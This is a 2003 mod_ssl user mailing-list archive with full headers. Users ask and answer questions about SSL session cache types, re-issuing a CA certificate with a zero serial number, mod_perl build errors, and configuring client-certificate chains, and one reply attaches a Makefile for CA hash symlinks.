Received: from hotmail.com (bay9-f31.bay9.hotmail.com [64.4.47.31])
	by master.modssl.org (Postfix) with ESMTP id 266A6A8933
	for ; Sat, 11 Oct 2003 18:01:42 +0200 (CEST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Sat, 11 Oct 2003 08:50:29 -0700
Received: from 192.55.4.36 by by9fd.bay9.hotmail.msn.com with HTTP;
	Sat, 11 Oct 2003 15:50:29 GMT
X-Originating-IP: [192.55.4.36]
X-Originating-Email: [sarah_haff@hotmail.com]
From: "Sarah Haff" 
To: users@httpd.apache.org, modssl-users@modssl.org
Subject: shmcb vs shmht
Date: Sat, 11 Oct 2003 08:50:29 -0700
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 11 Oct 2003 15:50:29.0494 (UTC) FILETIME=[654CB160:01C3900F]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Sarah Haff" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

What are the differences between
#SSLSessionCache        shmht:logs/ssl_scache(512000)
and
#SSLSessionCache        shmcb:logs/ssl_scache(512000)
(in ssl.conf file)

????


Sarah.

_________________________________________________________________
Share your photos without swamping your Inbox.  Get Hotmail Extra Storage 
today! http://join.msn.com/?PAGE=features/es

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct 11 19:09:08 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E0125A8A4B; Sat, 11 Oct 2003 19:09:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id AF826A893D
	for ; Sat, 11 Oct 2003 19:08:51 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id 0BBF26E40BB; Sat, 11 Oct 2003 19:08:43 +0200 (CEST)
Date: Sat, 11 Oct 2003 19:08:43 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: shmcb vs shmht
Message-ID: <20031011170843.GA4856@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sat, Oct 11, 2003 at 08:50:29AM -0700, Sarah Haff wrote:
> Hi,
> 
> What are the differences between
> #SSLSessionCache        shmht:logs/ssl_scache(512000)
> and
> #SSLSessionCache        shmcb:logs/ssl_scache(512000)
> (in ssl.conf file)
> 
Two different ways of storing sessions in shared memory -
ht is a hashtable while cb is a cyclic buffer. Look back
in the archive for mails from Geoff Thorpe for all the
gory details.

One thing that came to mind about your problem from the
other day - iirc you had a long session timeout, but a
small sized cache. Try increasing the size and/or lowering
the Timeout - just to make sure you're not exhausting your
session store capacity before the browser times out.

vh

Mads Toftum
-- 
Speaking at ApacheCon 2003 - http://ApacheCon.com/
T03, "Apache 2 mod_ssl tutorial" (3h)
WE03, "Troubleshooting Apache configurations" 
WE11, "Apache mod_rewrite, the Swiss Army Knife of URL manipulation" 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 15 00:59:04 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7BC55A8945; Wed, 15 Oct 2003 00:59:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from pluto.trimble.co.nz (pluto.trimble.co.nz [210.86.12.194])
	by master.modssl.org (Postfix) with ESMTP id 933DBA8933
	for ; Wed, 15 Oct 2003 00:58:45 +0200 (CEST)
Received: (qmail 14263 invoked from network); 15 Oct 2003 11:58:25 +1300
Received: from thoth.trimble.co.nz (10.3.0.221)
  by pluto.trimble.co.nz with SMTP; 15 Oct 2003 11:58:25 +1300
Received: (qmail 24040 invoked by uid 5081); 14 Oct 2003 22:58:25 -0000
Received: from jhaar@trimble.co.nz by thoth.trimble.co.nz by uid 101 with qmail-scanner-1.20rc4 
 (trophie: 6.510-1002/653/55774. sophie: 3.02/2.14/3.69. spamassassin: 2.60.  Clear:RC:1:. 
 Processed in 0.026706 secs); 14 Oct 2003 22:58:25 -0000
Received: from crom.trimble.co.nz (10.3.0.198)
  by thoth.trimble.co.nz with SMTP; 14 Oct 2003 22:58:24 -0000
Received: (qmail 28587 invoked by uid 500); 14 Oct 2003 22:58:24 -0000
Date: Wed, 15 Oct 2003 11:58:24 +1300
From: Jason Haar 
To: modssl-users@modssl.org
Subject: Re: Can I "resign" an existing CA cert without breaking anything?
Message-ID: <20031014225824.GF22873@trimble.co.nz>
Mail-Followup-To: Jason Haar ,
	modssl-users@modssl.org
References: <20031009215309.GO31653@trimble.co.nz>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20031009215309.GO31653@trimble.co.nz>
User-Agent: Mutt/1.4.1i
Organization: Trimble Navigation New Zealand Ltd.
X-Spam-Rating: pluto.trimble.co.nz 1.6.3-jlh 0/200100/A
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jason Haar 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Oct 10, 2003 at 10:53:09AM +1300, Jason Haar wrote:
> It's all working well - until now. We have found that we cannot sign certs
> created by Cisco IOS - well it can - but then the Cisco refuses to use it.
> Upon talking to Cisco, they say it's because our CA has a Serial number of
> "0" - which is illegal(!?). They said this was a known bug in OpenSSL that
> was fixed in a later release...
> 
> Anyway, if all that is true, I'd like to simply re-create the CA cert under
> a newer OpenSSL release - using the existing private key and serial number 1
> - which for some reason is actually available (the first signed cert starts
> at 2 - don't know why!). 
> 

Some results. If I simply renew the certificate  - so that the only thing
that's changed is the expire date - that new CA cert can be used seamlessly
with the existing infrastructure.

However, I didn't want that. I wanted to change the Serial number from '0'
to '1'. So I renewed it again but set the serial to '1', and it breaks
everything :-(

Does that sound correct? Even though the private and public key are the
same, changing the serial number "isn't allowed"?

Sounds like we either tear out our entire PKI infrastructure and start
again, or I have to bring up a RA... Well, that's a hard choice ;-/

-- 
Cheers

Jason Haar
Information Security Manager, Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 17 23:39:50 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D73CEA8943; Fri, 17 Oct 2003 23:39:50 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from math.gatech.edu (math.gatech.edu [130.207.146.50])
	by master.modssl.org (Postfix) with ESMTP id E7C64A8933
	for ; Fri, 17 Oct 2003 23:39:33 +0200 (CEST)
Received: from hemi.math.gatech.edu (hemi.math.gatech.edu [130.207.146.192])
	by math.gatech.edu (8.12.10/8.12.10) with ESMTP id h9HLdSe6024132
	for ; Fri, 17 Oct 2003 17:39:29 -0400 (EDT)
Received: from hemi.math.gatech.edu (localhost [127.0.0.1])
	by hemi.math.gatech.edu (8.12.9/8.12.9) with ESMTP id h9HLdRjF000510
	for ; Fri, 17 Oct 2003 17:39:27 -0400
Received: (from villegas@localhost)
	by hemi.math.gatech.edu (8.12.9/8.12.9/Submit) id h9HLdRtI000509
	for modssl-users@modssl.org; Fri, 17 Oct 2003 17:39:27 -0400
Date: Fri, 17 Oct 2003 17:39:27 -0400
From: Carlos Villegas 
To: modssl-users@modssl.org
Subject: Re: Can I "resign" an existing CA cert without breaking anything?
Message-ID: <20031017213927.GV19272@hemi.math.gatech.edu>
References: <20031009215309.GO31653@trimble.co.nz> <20031014225824.GF22873@trimble.co.nz>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20031014225824.GF22873@trimble.co.nz>
User-Agent: Mutt/1.4.1i
X-GTMath-Relay: 130.207.146.192
X-Spam-Status: SpamAssassin not applied to messages from Local Relay
X-Scanned-By: MIMEDefang 2.37
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Carlos Villegas 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> Sounds like we either tear out our entire PKI infrastructure and start
> again, or I have to bring up a RA... Well, that's a hard choice ;-/

Just a thought: I think it should be possible for you to create a "second"
CA certificate with id 1, and sign it with your first CA, and generate
use that second CA to sign cisco's certs, in that way the chain is preserved
and everyone is happy. Then you can start moving away from the initial CA
at your pace.

Carlos

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 21 00:30:04 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0AC8DA8959; Tue, 21 Oct 2003 00:30:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.speakeasy.net (mail8.speakeasy.net [216.254.0.208])
	by master.modssl.org (Postfix) with ESMTP id 2626BA8933
	for ; Tue, 21 Oct 2003 00:29:47 +0200 (CEST)
Received: (qmail 25971 invoked from network); 20 Oct 2003 22:29:43 -0000
Received: from unknown (HELO t20) ([66.92.188.251])
          (envelope-sender )
          by mail8.speakeasy.net (qmail-ldap-1.03) with SMTP
          for ; 20 Oct 2003 22:29:43 -0000
From: "Bryn Dyment" 
To: 
Subject: mod_ssl/mod_perl: fine in isolation, install woes when together
Date: Mon, 20 Oct 2003 15:29:47 -0700
Message-ID: <002301c39759$ab4a6990$6401a8c0@t20>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.4510
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Bryn Dyment" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I've isolated this pretty well... hope someone has some insight:

After a fresh* install of FreeBSD 4.8, I can build Apache alone with
mod_ssl, and Apache alone with mod_perl (static).  However, I'm getting
errors when trying to install both together.

Here are my steps:

	tar -xzf apache_1.3.28.tar.gz
	tar -xzf mod_ssl-2.8.15-1.3.28.tar.gz
	tar -xzf mod_perl-1.29.tar.gz

	cd mod_ssl-2.8.15-1.3.28
	./configure --with-apache=3D../apache_1.3.28

	cd ../mod_perl-1.29
	perl Makefile.PL APACHE_SRC=3D../apache_1.3.28/src \
		EVERYTHING=3D1 PREP_HTTPD=3D1 USE_APACI=3D1
	make
	make install

	cd ../apache_1.3.28
	setenv SSL_BASE SYSTEM
	./configure --with-layout=3DFreeBSD \
		--activate-module=3Dsrc/modules/perl/libperl.a \
		--enable-module=3Dssl
	make

It's during this make that things go south.  It successfully finishes =
both
the ssl and perl sections (i.e., I see "<=3D=3D=3D src/modules/ssl" and =
"<=3D=3D=3D
src/modules/perl" in the log).  Immediately after, I get two successful
'gcc' lines, then the following:

---
gcc -funsigned-char -DMOD_SSL=3D208115 -DMOD_PERL -DUSE_PERL_SSI
-DHAS_FPSETMASK -DHAS_FLOATINGPOINT_H -fno-strict-aliasing -DEAPI
-DUSE_EXPAT -I./lib/expat-lite -DNO_DL_NEEDED `./apaci` -L/usr/lib -o =
httpd
buildmark.o modules.o  modules/standard/libstandard.a =
modules/ssl/libssl.a
modules/perl/libperl.a main/libmain.a ./os/unix/libos.a ap/libap.a
lib/expat-lite/libexpat.a -lcrypt -lssl -lcrypto -Wl,-E
/usr/local/lib/perl5/5.8.1/i386-freebsd/auto/DynaLoader/DynaLoader.a
-L/usr/local/lib/perl5/5.8.1/i386-freebsd/CORE -lperl -lm -lcrypt -lutil =
-lc

modules/perl/libperl.a(mod_perl.o): In function `perl_restart_handler':
mod_perl.o(.text+0x23b): undefined reference to `Perl_get_sv'
modules/perl/libperl.a(mod_perl.o): In function `perl_restart':
mod_perl.o(.text+0x2c7): undefined reference to `Perl_get_sv'
mod_perl.o(.text+0x2fe): undefined reference to `Perl_eval_pv'
mod_perl.o(.text+0x31a): undefined reference to `Perl_sv_setsv_flags'
modules/perl/libperl.a(mod_perl.o): In function `mod_perl_set_cwd':
mod_perl.o(.text+0x3c0): undefined reference to `Perl_eval_pv'
mod_perl.o(.text+0x3d0): undefined reference to `Perl_sv_setsv_flags'

[pages and pages more of similar errors...]

Ideas?




___
*no packages/ports, upgraded to Perl 5.8.1 (from source), installed
Bundle::LWP via CPAN utility

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 24 15:03:53 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B44ACA8A4B; Fri, 24 Oct 2003 15:03:53 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mta03-svc.ntlworld.com (mta03-svc.ntlworld.com [62.253.162.43])
	by master.modssl.org (Postfix) with ESMTP id 27BC3A8936
	for ; Fri, 24 Oct 2003 15:03:52 +0200 (CEST)
Received: from linux ([80.7.147.56]) by mta03-svc.ntlworld.com
          (InterMail vM.4.01.03.37 201-229-121-137-20020806) with ESMTP
          id <20031024130347.MNMV21223.mta03-svc.ntlworld.com@linux>
          for ; Fri, 24 Oct 2003 14:03:47 +0100
Content-Type: text/plain;
  charset="us-ascii"
From: Chris Covell 
To: modssl-users@modssl.org
Subject: Client authentication and Chain certs
Date: Fri, 24 Oct 2003 14:04:06 +0000
X-Mailer: KMail [version 1.4]
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-Id: <200310241404.06751.chris@katjam.co.uk>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Chris Covell 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello there, can any of you guys help me with this problem please ?

I have been using mod_ssl and client authentication via apache for some t=
ime=20
now without any problems. My Apache configuration has been the usual:

SSLCertificateFile=09=09/etc/httpd/conf/ssl.crt/server.crt
SSLCertificateKeyFile=09=09/etc/httpd/conf/ssl.key/server.key
SSLCACertificateFile=09=09/etc/httpd/conf/ssl.crt/cacert.crt

No worries.

Up until now the CA certificate has always been a self signed root CA. Bu=
t=20
today I need to use a web server cert signed by a sub CA and have my clie=
nts=20
authenticated using certs from the sub CA.

I did not think that this would be a problem, so I just copied the correc=
t=20
files in to the correct places (sub ca cert to SSLCACertificateFile and=20
server cert to SSLCertificateFile). But I got a page not found error in I=
E=20
and the Apache error:

mod_ssl: Certificate Verification: Error (20): unable to get local issuer=
=20
certificate

OK, so I implemented the SSLCertificateChainFile

with a bundle of the two certs in my chain, sub and root.

I know openssl can get them because:

openssl verify -CAfile chain.crt server.crt

works a treat.

I have now tried various combinations of chain file content (root ca, sub=
 ca,=20
etc) and even putting the chain certs in the server.crt file, but none of=
=20
these helps.=20

I am running an "up2date" RedHat 7.2 with out the box apache and mod ssl.

Has anyone got an answer for me, please !!!!! I am sure this is possible,=
 and=20
none of the docs seem to sugest that I am going to have any issues.

Chris...

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 24 15:17:53 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B5DD6A8938; Fri, 24 Oct 2003 15:17:53 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lyomail.in2p3.fr (lyomail.in2p3.fr [134.158.138.12])
	by master.modssl.org (Postfix) with ESMTP id 41AEBA8936
	for ; Fri, 24 Oct 2003 15:17:36 +0200 (CEST)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by lyomail.in2p3.fr (Postfix) with ESMTP
	id 75C2824406A; Fri, 24 Oct 2003 15:17:32 +0200 (CEST)
Received: from lyomail.in2p3.fr ([127.0.0.1])
 by localhost (lyomail [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
 id 29192-07; Fri, 24 Oct 2003 15:17:31 +0200 (CEST)
Received: from ipnl.in2p3.fr (lyopc128.in2p3.fr [134.158.139.178])
	by lyomail.in2p3.fr (Postfix) with ESMTP
	id 25DD2244069; Fri, 24 Oct 2003 15:17:27 +0200 (CEST)
Date: Fri, 24 Oct 2003 15:17:24 +0200 (CEST)
From: m.chartoire@ipnl.in2p3.fr
Subject: Re: Client authentication and Chain certs
To: modssl-users@modssl.org
In-Reply-To: <200310241404.06751.chris@katjam.co.uk>
MIME-Version: 1.0
Content-Type: MULTIPART/mixed; BOUNDARY="-1635339637-846930886-1067001451=:4683"
Content-Transfer-Encoding: BINARY
Message-Id: <20031024131727.25DD2244069@lyomail.in2p3.fr>
X-Virus-Scanned: by amavisd-new at ipnl.in2p3.fr
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: m.chartoire@ipnl.in2p3.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

---1635339637-846930886-1067001451=:4683
Content-Type: TEXT/plain; charset=us-ascii


  We also have: root CA -> sub CA -> client or server cert

  we have put the root and sub CA in a directory pointed by:
  SSLCACertificatePath

  In this directory we have the attatched Makefile that we run to make a
  hash of all CA and link the result of the hash to eatch CA.

  This work fine whith apache 1.3.3x to the latest 2.4.

-- 
Martial Chartoire, Service Informatique | E-mail: m.chartoire@ipnl.in2p3.fr
Institut de Physique Nucleaire de Lyon  | phone : +33 472 448 430
43, BD du 11 Novembre 1918              | fax   : +33 472 448 004
F 69622 Villeurbanne Cedex              |
---1635339637-846930886-1067001451=:4683
Content-Type: TEXT/plain; name=Makefile
Content-Disposition: attachment; filename=Makefile

##
##  Makefile to keep the hash symlinks in SSLCACertificatePath up to date
##  Copyright (c) 1998-2001 Ralf S. Engelschall, All Rights Reserved. 
##

SSL_PROGRAM=

update: clean
	-@ssl_program="$(SSL_PROGRAM)"; \
	if [ ".$$ssl_program" = . ]; then \
	    for dir in . `echo $$PATH | sed -e 's/:/ /g'`; do \
	        for program in openssl ssleay; do \
	            if [ -f "$$dir/$$program" ]; then \
	                if [ -x "$$dir/$$program" ]; then \
	                    ssl_program="$$dir/$$program"; \
						break; \
	                fi; \
	            fi; \
	        done; \
	        if [ ".$$ssl_program" != . ]; then \
				break; \
	        fi; \
	    done; \
	fi; \
	if [ ".$$ssl_program" = . ]; then \
	    echo "Error: neither 'openssl' nor 'ssleay' program found" 1>&2; \
	    exit 1; \
	fi; \
	for file in *.crt; do \
	    if [ ".`grep SKIPME $$file`" != . ]; then \
	        echo dummy |\
	        awk '{ printf("%-15s ... Skipped\n", file); }' \
	        "file=$$file"; \
	    else \
	        n=0; \
	        while [ 1 ]; do \
	            hash="`$$ssl_program x509 -noout -hash <$$file`"; \
	            if [ -r "$$hash.$$n" ]; then \
	                n=`expr $$n + 1`; \
	            else \
	                echo dummy |\
	                awk '{ printf("%-15s ... %s\n", file, hash); }' \
	                "file=$$file" "hash=$$hash.$$n"; \
	                ln -s $$file $$hash.$$n; \
	                break; \
	            fi; \
	        done; \
	    fi; \
	done

clean:
	-@rm -f [0-9a-fA-F]*.[0-9]*


---1635339637-846930886-1067001451=:4683--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 24 15:23:20 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 65427A8938; Fri, 24 Oct 2003 15:23:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mta07-svc.ntlworld.com (mta07-svc.ntlworld.com [62.253.162.47])
	by master.modssl.org (Postfix) with ESMTP id D3481A8933
	for ; Fri, 24 Oct 2003 15:23:03 +0200 (CEST)
Received: from linux ([80.7.147.56]) by mta07-svc.ntlworld.com
          (InterMail vM.4.01.03.37 201-229-121-137-20020806) with ESMTP
          id <20031024132300.HUBU2637.mta07-svc.ntlworld.com@linux>
          for ; Fri, 24 Oct 2003 14:23:00 +0100
Content-Type: text/plain;
  charset="iso-8859-1"
From: Chris Covell 
To: modssl-users@modssl.org
Subject: Re: Client authentication and Chain certs
Date: Fri, 24 Oct 2003 14:23:20 +0000
X-Mailer: KMail [version 1.4]
References: <20031024131727.25DD2244069@lyomail.in2p3.fr>
In-Reply-To: <20031024131727.25DD2244069@lyomail.in2p3.fr>
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-Id: <200310241423.20776.chris@katjam.co.uk>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Chris Covell 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello there Martial,

many thanks for you quick reply.

>   We also have: root CA -> sub CA -> client or server cert
>
>   we have put the root and sub CA in a directory pointed by:
>   SSLCACertificatePath
>

In seperate files ?

>   In this directory we have the attatched Makefile that we run to make =
a
>   hash of all CA and link the result of the hash to eatch CA.
>
>   This work fine whith apache 1.3.3x to the latest 2.4.

Did you use "SSLCertificateChainFile" in the httpd.conf ?

Chris...
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 24 15:49:08 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0ABBCA8938; Fri, 24 Oct 2003 15:49:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from brunog1.spinweb.net (brunog1.spinweb.net [198.173.255.31])
	by master.modssl.org (Postfix) with ESMTP id EF63FA8933
	for ; Fri, 24 Oct 2003 15:48:48 +0200 (CEST)
Received: from xbridge.com (xbridgelimited-2.dsl.easynet.co.uk [212.135.187.146])
	(authenticated bits=0)
	by brunog1.spinweb.net (8.12.6p3/8.12.6) with ESMTP id h9ODmaEj070691
	for ; Fri, 24 Oct 2003 13:48:43 GMT
	(envelope-from bruno@xbridge.com)
Date: Fri, 24 Oct 2003 14:48:28 +0100
Subject: Re: Client authentication and Chain certs
Content-Type: text/plain; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v552)
From: Bruno Georges 
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
In-Reply-To: <200310241404.06751.chris@katjam.co.uk>
Message-Id: 
X-Mailer: Apple Mail (2.552)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bruno Georges 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Chris
I had exactly the same issue.
The problem was that when I moved to this new type of cert [sub CA], I 
didn't read all the installation information :-)
We used BT Trust Services which provided an 'intermediate certificate'
The intermediate cert is required to identified the Root CA.
I downloaded it from their site on our server.
I used the SSLCertificateChainFile directive first but still the server 
wouldn't start
Error was:
[Wed Aug 20 19:41:22 2003] [error] Failed to configure CA certificate 
chain!

I then used:
         SSLCACertificateFile /www/ssl/oursite.co.uk/intermediate.crt
         SSLCertificateFile /www/ssl/oursite.co.uk/oursite.crt
         SSLCertificateKeyFile /www/ssl/oursite.co.uk/oursite.key
It works perfectly with Apache 2.0.4x

Hope this helps.

Regards
Bruno Georges
On Friday, Oct 24, 2003, at 15:04 Europe/London, Chris Covell wrote:

> Hello there, can any of you guys help me with this problem please ?
>
> I have been using mod_ssl and client authentication via apache for 
> some time
> now without any problems. My Apache configuration has been the usual:
>
> SSLCertificateFile		/etc/httpd/conf/ssl.crt/server.crt
> SSLCertificateKeyFile		/etc/httpd/conf/ssl.key/server.key
> SSLCACertificateFile		/etc/httpd/conf/ssl.crt/cacert.crt
>
> No worries.
>
> Up until now the CA certificate has always been a self signed root CA. 
> But
> today I need to use a web server cert signed by a sub CA and have my 
> clients
> authenticated using certs from the sub CA.
>
> I did not think that this would be a problem, so I just copied the 
> correct
> files in to the correct places (sub ca cert to SSLCACertificateFile and
> server cert to SSLCertificateFile). But I got a page not found error 
> in IE
> and the Apache error:
>
> mod_ssl: Certificate Verification: Error (20): unable to get local 
> issuer
> certificate
>
> OK, so I implemented the SSLCertificateChainFile
>
> with a bundle of the two certs in my chain, sub and root.
>
> I know openssl can get them because:
>
> openssl verify -CAfile chain.crt server.crt
>
> works a treat.
>
> I have now tried various combinations of chain file content (root ca, 
> sub ca,
> etc) and even putting the chain certs in the server.crt file, but none 
> of
> these helps.
>
> I am running an "up2date" RedHat 7.2 with out the box apache and mod 
> ssl.
>
> Has anyone got an answer for me, please !!!!! I am sure this is 
> possible, and
> none of the docs seem to sugest that I am going to have any issues.
>
> Chris...
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>
Bruno Georges
Xbridge Ltd
Tel: +44 (0) 207 378 9830
Mob: +44 (0) 787 988 4895

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 24 15:53:18 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 849F1A8A4B; Fri, 24 Oct 2003 15:53:18 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web20502.mail.yahoo.com (web20502.mail.yahoo.com [216.136.226.137])
	by master.modssl.org (Postfix) with SMTP id 995E3A8933
	for ; Fri, 24 Oct 2003 15:53:01 +0200 (CEST)
Message-ID: <20031024135251.89476.qmail@web20502.mail.yahoo.com>
Received: from [62.129.121.33] by web20502.mail.yahoo.com via HTTP; Fri, 24 Oct 2003 06:52:51 PDT
Date: Fri, 24 Oct 2003 06:52:51 -0700 (PDT)
From: Matt Stevenson 
Subject: Re: Client authentication and Chain certs
To: modssl-users@modssl.org
In-Reply-To: <200310241423.20776.chris@katjam.co.uk>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have this setup, this should work...

SSLCertificateFile
/opt/DKBapache/conf/ssl.crt/server.crt
SSLCertificateKeyFile
/opt/DKBapache/conf/ssl.key/server.key
SSLCACertificateFile
/opt/DKBapache/conf/ssl.crt/CA.crt
SSLVerifyClient require
SSLVerifyDepth  2

The CA.crt file contains the Root and intermediate
certs. These are also used at startup to make the
server cert chain (our client and server certs have
the same root, use SSLCertificateChainFile for the
server chain if not). Make sure you you have the
SSLVerifyDepth  2 line.

Regards
Matt
--- Chris Covell  wrote:
> Hello there Martial,
> 
> many thanks for you quick reply.
> 
> >   We also have: root CA -> sub CA -> client or
> server cert
> >
> >   we have put the root and sub CA in a directory
> pointed by:
> >   SSLCACertificatePath
> >
> 
> In seperate files ?
> 
> >   In this directory we have the attatched Makefile
> that we run to make a
> >   hash of all CA and link the result of the hash
> to eatch CA.
> >
> >   This work fine whith apache 1.3.3x to the latest
> 2.4.
> 
> Did you use "SSLCertificateChainFile" in the
> httpd.conf ?
> 
> Chris...
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
majordomo@modssl.org


__________________________________
Do you Yahoo!?
The New Yahoo! Shopping - with improved product search
http://shopping.yahoo.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

